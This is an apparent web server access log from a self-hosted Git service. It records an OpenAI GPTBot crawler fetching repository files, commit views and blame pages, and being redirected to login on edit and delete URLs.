"https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:16:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:16:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:16:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=source" [Client 74.7.227.38] [Length 11333] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:16:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:16:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=source" [Client 74.7.227.38] [Length 11340] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:16:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:16:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/projects?q=&sort=leastupdate&state=open" [Client 74.7.227.38] [Length 6798] [Gzip 2.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/-/projects" -[17/Feb/2026:16:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12945] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 11735] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=mostissues&state=open" [Client 74.7.227.38] [Length 8504] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=mostissues&state=closed" -[17/Feb/2026:16:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=leastissues&state=all" [Client 74.7.227.38] [Length 8499] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=leastissues&state=open" -[17/Feb/2026:16:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 13661] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" -[17/Feb/2026:16:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fOpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 21787] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:16:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14442] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 9834] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:16:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:16:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10924] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:16:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12878] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:16:34:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" -[17/Feb/2026:16:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/claude.md" -[17/Feb/2026:16:34:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" -[17/Feb/2026:16:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/claude.md" -[17/Feb/2026:16:34:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:34:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 9825] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" -[17/Feb/2026:16:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 15688] [Gzip 8.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" -[17/Feb/2026:16:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1555] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" -[17/Feb/2026:16:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" -[17/Feb/2026:16:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fobj%2fTestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 22265] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:16:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 11848] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:16:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md?display=source" [Client 74.7.227.38] [Length 22143] [Gzip 6.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:16:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibcrypto-3-x64.dll" [Client 74.7.227.38] [Length 23788] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:16:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13182] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13182] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html" [Client 74.7.227.38] [Length 99885] [Gzip 10.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:16:35:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/claude.md" -[17/Feb/2026:16:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/claude.md" -[17/Feb/2026:16:35:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/claude.md" -[17/Feb/2026:16:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/.TemporaryDocument/claude.md" -[17/Feb/2026:16:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11210] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 10043] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" -[17/Feb/2026:16:35:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" -[17/Feb/2026:16:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv" -[17/Feb/2026:16:35:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 